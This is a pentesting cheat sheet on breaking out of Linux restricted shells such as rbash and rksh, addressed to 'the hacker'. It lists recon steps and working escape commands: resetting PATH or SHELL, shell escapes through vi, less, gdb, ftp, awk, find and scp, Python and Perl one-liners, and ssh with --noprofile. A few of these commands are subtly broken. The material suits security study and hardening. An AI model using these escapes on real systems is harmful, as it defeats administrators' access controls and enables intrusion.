Escaping Restricted Shell
Some sysadmins don't want their users to have access to all commands. So they get a restriced shell. If the hacker get access to a user with a restriced shell we need to be able to break out of that, escape it, in order to have more power.
Many linux distros include rshell, which is a restriced shell.
To access the restried shell you can do this:
sh -r
rsh
rbash
bash -r
bash --restricted
rksh
ksh -r
http://securebean.blogspot.cl/2014/05/escaping-restricted-shell_3.html?view=sidebar
http://pen-testing.sans.org/blog/pen-testing/2012/06/06/escaping-restricted-linux-shells
Breaking Out
Getting out of restricted shell
Reconnaissance¶
Find out information about the environment.
- Run env to see exported environment variables
Run ‘export -p’ to see the exported variables in the shell. This would tell which variables are read-only. Most likely the PATH ($PATH) and SHELL ($SHELL) variables are ‘-rx’, which means we can execute them, but not write to them. If they are writeable, we would be able to escape the restricted shell!
If the SHELL variable is writeable, you can simply set it to your shell of choice (i.e. sh, bash, ksh, etc…).
If the PATH is writeable, then you’ll be able to set it to any directory you want. I recommend setting it to one that has commands vulnerable to shell escapes.
Try basic Unix commands and see what’s allowed ls, pwd, cd, env, set, export, vi, cp, mv etc.
Quick Wins
If ‘/’ is allowed in commands just run /bin/sh
If we can set PATH or SHELL variable
export PATH=/bin:/usr/bin:/sbin:$PATH
export SHELL=/bin/sh
or if chsh command is present just change the shell to /bin/bash
chsh
password: <password will be asked>
/bin/bash
If we can copy files into existing PATH, copy
cp /bin/sh /current/directory; sh
Taking help of binaries
Some commands let us execute other system commands, often bypassing shell restrictions
- ftp -> !/bin/sh
- gdb -> !/bin/sh
- more/ less/ man -> !/bin/sh
- vi -> :!/bin/sh : Refer Breaking out of Jail : Restricted Shell and Restricted Accounts and Vim Tricks in Linux and Unix
- scp -S /tmp/getMeOut.sh x y : Refer Breaking out of rbash using scp
- awk ‘BEGIN {system(“/bin/sh”)}’
- find / -name someName -exec /bin/sh ;
- tee
echo "Your evil code" | tee script.sh
Invoke shell thru scripting language
Python
python -c 'import os; os.system("/bin/bash")
Perl
perl -e 'exec "/bin/sh";'
SSHing from outside
- Use SSH on your machine to execute commands before the remote shell is loaded:
ssh username@IP -t "/bin/sh"
- Start the remote shell without loading “rc” profile ( where most of the limitations are often configured)
ssh username@IP -t "bash --noprofile"